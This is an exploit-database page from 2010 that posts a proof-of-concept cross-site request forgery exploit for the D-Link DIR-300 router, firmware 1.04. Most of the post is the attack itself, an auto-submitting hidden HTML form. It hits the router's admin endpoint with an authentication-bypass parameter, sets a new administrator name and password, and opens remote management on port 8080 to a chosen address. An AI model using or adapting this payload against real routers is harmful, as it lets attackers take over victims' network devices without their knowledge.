Home / os / win7

[webapps / 0day] - D-Link DIR-300 CSRF Vulnerability (Change

Posted on 17 December 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>D-Link DIR-300 CSRF Vulnerability (Change Admin Account Settings) | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='D-Link DIR-300 CSRF Vulnerability (Change Admin Account Settings) by outlaw.dll in webapps / 0day | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>================================================================= D-Link DIR-300 CSRF Vulnerability (Change Admin Account Settings) ================================================================= &lt;!-- [+] Title: D-Link DIR-300 CSRF Vuln. (Change Admin Account Settings) PoC Exploit [+] Description: Enable Remote Menagement for specific IP [+] Firmware Version: 1.04 [+] Note: No need administrator to be logged (: [+] Author: outlaw.dll [+] Date: 17.12.2010 [+] Tested on: Windows 7 Ultimate (Google Chrome) but will work in any other OS This firmware version is full of CSRF and other type of vulnerabilities. W_o.O_W --&gt; &lt;form name=&quot;exploit&quot; action=&quot;http://server/tools_admin.php?NO_NEED_AUTH=1&amp;AUTH_GROUP=0&quot; method=&quot;post&quot;&gt; &lt;input type=&quot;hidden&quot; name=&quot;ACTION_POST&quot; value=&quot;1&quot; /&gt; &lt;input type=&quot;hidden&quot; name=&quot;admin_name&quot; value=&quot;outlaw.dll&quot; /&gt; &lt;input type=&quot;hidden&quot; name=&quot;admin_password1&quot; value=&quot;1337&quot; /&gt; &lt;input type=&quot;hidden&quot; name=&quot;admin_password2&quot; value=&quot;1337&quot; /&gt; &lt;input type=&quot;hidden&quot; name=&quot;rt_enable_h&quot; value=&quot;1&quot; /&gt; &lt;input type=&quot;hidden&quot; name=&quot;rt_port&quot; value=&quot;8080&quot; /&gt; &lt;input type=&quot;hidden&quot; name=&quot;rt_ipaddr&quot; value=&quot;192.168.0.1337&quot; /&gt; &lt;/form&gt; &lt;script&gt;document.exploit.submit();&lt;/script&gt; # <a href='http://1337db.com/'>1337db.com</a> [2010-12-17]</pre></body></html>

 

TOP